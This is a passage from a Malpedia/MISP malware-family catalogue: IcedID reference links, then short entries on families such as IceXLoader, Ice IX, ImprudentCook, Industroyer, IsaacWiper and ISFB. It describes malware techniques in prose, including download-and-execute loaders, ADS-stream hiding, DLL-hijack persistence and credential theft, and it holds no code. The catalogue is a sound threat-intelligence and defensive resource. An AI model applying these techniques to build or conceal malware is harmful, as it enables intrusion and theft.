https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://isc.sans.edu/diary/29740

https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html

https://thedfirreport.com/2021/05/12/conti-ransomware/

https://eln0ty.github.io/malware%20analysis/IcedID/

https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion

https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/

https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan

https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/

https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader

https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary

https://www.youtube.com/watch?v=wObF9n2UIAM

https://www.youtube.com/watch?v=7Dk7NkIbVqY

https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol

https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites

https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/

https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240

https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://malwation.com/icedid-malware-technical-analysis-report/

https://tccontre.blogspot.com/2021/01/

https://www.youtube.com/watch?v=YEqLIR6hfOM

https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1

https://cert.gov.ua/article/39609

https://github.com/f0wl/deICEr

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic

https://www.ironnet.com/blog/ransomware-graphic-blog

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://www.netresec.com/?page=Blog&month=2023-10&post=Forensic-Timeline-of-an-IcedID-Infection

https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/

https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/

https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html

https://unit42.paloaltonetworks.com/atoms/monsterlibra/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://isc.sans.edu/diary/rss/28934

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/

https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/

https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://blog.reconinfosec.com/an-encounter-with-ta551-shathak

https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344

https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/

https://twitter.com/Unit42_Intel/status/1645851799427874818

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

https://www.group-ib.com/blog/icedid

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html

https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/

https://netresec.com/?b=214d7ff

https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders

https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html

https://www.youtube.com/watch?v=wMXD4Sv1Alw

https://www.silentpush.com/blog/malicious-infrastructure-as-a-service

https://github.com/telekom-security/icedid_analysis

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html

https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html

https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns

http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/

https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://blog.talosintelligence.com/2020/07/valak-emerges.html

https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros

https://nikpx.github.io/malware/analysis/2022/03/09/BokBot

https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view

https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/

https://thedfirreport.com/2022/04/25/quantum-ransomware/

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/

https://twitter.com/felixw3000/status/1521816045769662468

https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html

https://forensicitguy.github.io/analyzing-icedid-document/

https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/

https://unit42.paloaltonetworks.com/ta551-shathak-icedid/

https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/

https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html

https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/

https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf

https://www.elastic.co/security-labs/unpacking-icedid

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.team-cymru.com/post/from-chile-with-malware

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://intel471.com/blog/malvertising-surges-to-distribute-malware

https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/

https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back

https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2

win.icexloader

IceXLoader is a commercial malware used to download and deploy additional malware on infected machines. The latest version is written in Nim, a relatively new language utilized by threat actors the past two years, most notably by the NimzaLoader variant of BazarLoader used by the TrickBot group.

The v1 was written in AutoIT.

The tag is: misp-galaxy:malpedia="win.icexloader"

win.icexloader is also known as:

Table 3723. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader

https://www.fortinet.com/blog/threat-research/new-icexloader-3-0-developers-warm-up-to-nim

Ice IX

The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.

The tag is: misp-galaxy:malpedia="Ice IX"

Ice IX is also known as:

Table 3724. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix

https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus

https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/

https://securelist.com/ice-ix-not-cool-at-all/29111/

https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/

IconDown

The tag is: misp-galaxy:malpedia="IconDown"

IconDown is also known as:

Table 3725. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown

https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html

IcyHeart

The tag is: misp-galaxy:malpedia="IcyHeart"

IcyHeart is also known as:

  • Troxen

Table 3727. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart

IDKEY

The tag is: misp-galaxy:malpedia="IDKEY"

IDKEY is also known as:

Table 3728. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey

https://isc.sans.edu/diary/22766

IISpy

The tag is: misp-galaxy:malpedia="IISpy"

IISpy is also known as:

  • BadIIS

Table 3730. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy

https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/

IMAPLoader

The tag is: misp-galaxy:malpedia="IMAPLoader"

IMAPLoader is also known as:

Table 3731. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.imap_loader

https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/

Immortal Stealer

ZScaler describes Immortal Stealer as a windows malware written in .NET designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions.

The tag is: misp-galaxy:malpedia=" Immortal Stealer"

Immortal Stealer is also known as:
Table 3734. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer

https://www.zscaler.com/blogs/research/immortal-information-stealer

ImprudentCook

ImprudentCook is an HTTP(S) downloader.

It was delivered in the Operation DreamJob type of activity targeting aerospace and defense companies in South Africa (in Q2 2022) and in Central Europe (in H1 2023), and against an unknown sector in South Korea back in Q2 2021.

It uses the AES cipher implemented through Windows Cryptographic Providers for decryption of its binary configuration, and also for encryption and decryption of the client-server communication.

It’s hidden in an ADS stream (:dat or :zone) of its dropper, together with its configuration (:rsrc) and an AES-128 CBC key with an initialization vector for its decryption (:kgb or :data).

It contains two characteristic arrays of strings that represent cookie names for web services, including Bing, Daum and GitHub:

  1. iKc;uid;OAX;DMP_UID;PCID;_gid;_gat;csrftoken;NID;1P_JAR;JSESSIONID;WLS;SNID; utma;BID;SRCHD;GsCK_AC;spintop;eader;XSRF-TOKEN;_gat_gtag_UA;webid_ enabled;EDGE_V;dtck_channel;dtmulti;UUID;XUID;ZIA;IUID;SSID;_gh_sess;_octo

  2. channel;post_titles;xfw_exp;wiht_clkey;SGPCOUPLE;NRTK;fbp;uaid;SRCHUSR;GUC;HPVN;dtck_ blog;dtck_media;MUIDB;SRCHHPGUSR;SiteMain

It contains a string, "5.40" or "5.60", looking like version information.

The tag is: misp-galaxy:malpedia="ImprudentCook"

ImprudentCook is also known as:

Table 3735. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://asec.ahnlab.com/ko/22975/

Industrial Spy

A ransomware that emerged in April 2022.

The tag is: misp-galaxy:malpedia="Industrial Spy"

Industrial Spy is also known as:

Table 3739. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy

https://www.zscaler.com/blogs/security-research/technical-analysis-industrial-spy-ransomware

Industroyer

Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.

The tag is: misp-galaxy:malpedia="Industroyer"

Industroyer is also known as:

  • Crash

  • CrashOverride

Table 3740. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf

https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://cert.gov.ua/article/39518

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/

https://www.secureworks.com/research/threat-profiles/iron-viking

https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://en.wikipedia.org/wiki/Industroyer

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/

INDUSTROYER2

The tag is: misp-galaxy:malpedia="INDUSTROYER2"

INDUSTROYER2 is also known as:

Table 3741. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2

https://pylos.co/2022/04/23/industroyer2-in-perspective/

https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/

https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://cert.gov.ua/article/39518

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://twitter.com/silascutler/status/1513870210398363651

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks

https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.scadafence.com/industroyer2-attack

https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.mandiant.com/resources/blog/gru-disruptive-playbook

Inferno

The tag is: misp-galaxy:malpedia="Inferno"

Inferno is also known as:

Table 3742. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno

https://github.com/LimerBoy/Inferno

InfinityLock

InfinityLock ransomware is a type of malicious software that encrypts a victim’s files and demands a ransom payment in order to decrypt them. It is spread through phishing emails and malicious websites. Once a computer is infected with InfinityLock, it encrypts all important files, such as documents, photos, and videos. It then displays a message that demands the victim pay a ransom of $1,000 in Bitcoin in order to decrypt the files. If the victim does not pay the ransom, the files will be lost permanently.

The tag is: misp-galaxy:malpedia="InfinityLock"

InfinityLock is also known as:

Table 3743. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.infinitylock

https://anti-spyware-101.com/remove-infinitylock-ransomware

InfoDot

Ransomware.

The tag is: misp-galaxy:malpedia="InfoDot"

InfoDot is also known as:

Table 3744. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot

https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html

InnaputRAT

InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.

The tag is: misp-galaxy:malpedia="InnaputRAT"

InnaputRAT is also known as:

Table 3747. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat

https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

win.innfirat

InnifiRAT is coded in .NET and targets personal data on infected devices, with it’s top priority appearing to be bitcoin and litecoin wallet data.

InffiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include loggin key stroke, taking pictures with webcam, accessing confidential information, formatting drives, and more.

It attempts to steal browser cookies to steal usernames and passwords and monitors the users activities with screenshot functionality.

The tag is: misp-galaxy:malpedia="win.innfirat"

win.innfirat is also known as:

Table 3748. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.innfirat

https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more

Interception (Windows)

ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that points towards Lazarus as potential origin.

The tag is: misp-galaxy:malpedia="Interception (Windows)"

Interception (Windows) is also known as:

Table 3749. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.interception

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf

Invicta Stealer

According to Cyble, The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data and extract information from applications like Steam and Discord.

The tag is: misp-galaxy:malpedia="Invicta Stealer"

Invicta Stealer is also known as:

Table 3750. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.invicta_stealer

https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/

InvisiMole

InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. The malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library. Malware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.

The smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.

The second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces.

The tag is: misp-galaxy:malpedia="InvisiMole"

InvisiMole is also known as:

Table 3751. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole

https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

IPStorm (Windows)

The tag is: misp-galaxy:malpedia="IPStorm (Windows)"

IPStorm (Windows) is also known as:

Table 3752. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ipstorm

https://maldbg.com/ipstorm-golang-malware-windows

IRONHALO

IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.
The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.

The tag is: misp-galaxy:malpedia="IRONHALO"

IRONHALO is also known as:

Table 3754. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.symantec.com/security-center/writeup/2015-122210-5128-99

https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

IronNetInjector

According to Mitre, IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.

The tag is: misp-galaxy:malpedia="IronNetInjector"

IronNetInjector is also known as:

Table 3755. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ironnetinjector

https://unit42.paloaltonetworks.com/ironnetinjector/

IsaacWiper

According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim’s machine.

The tag is: misp-galaxy:malpedia="IsaacWiper"

IsaacWiper is also known as:

  • LASAINRAW

Table 3757. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://twitter.com/ESETresearch/status/1521910890072842240

https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/

https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html

https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://www.brighttalk.com/webcast/15591/534324

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://experience.mandiant.com/trending-evil-2/p/1

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/

ISFB

2006 Gozi v1.0, Gozi CRM, CRM, Papras 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)

In September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.

The other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.

There is one panel which often was used in combination with ISFB: IAP. The panel’s login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.

ISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.

In April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.

See win.gozi for additional historical information.

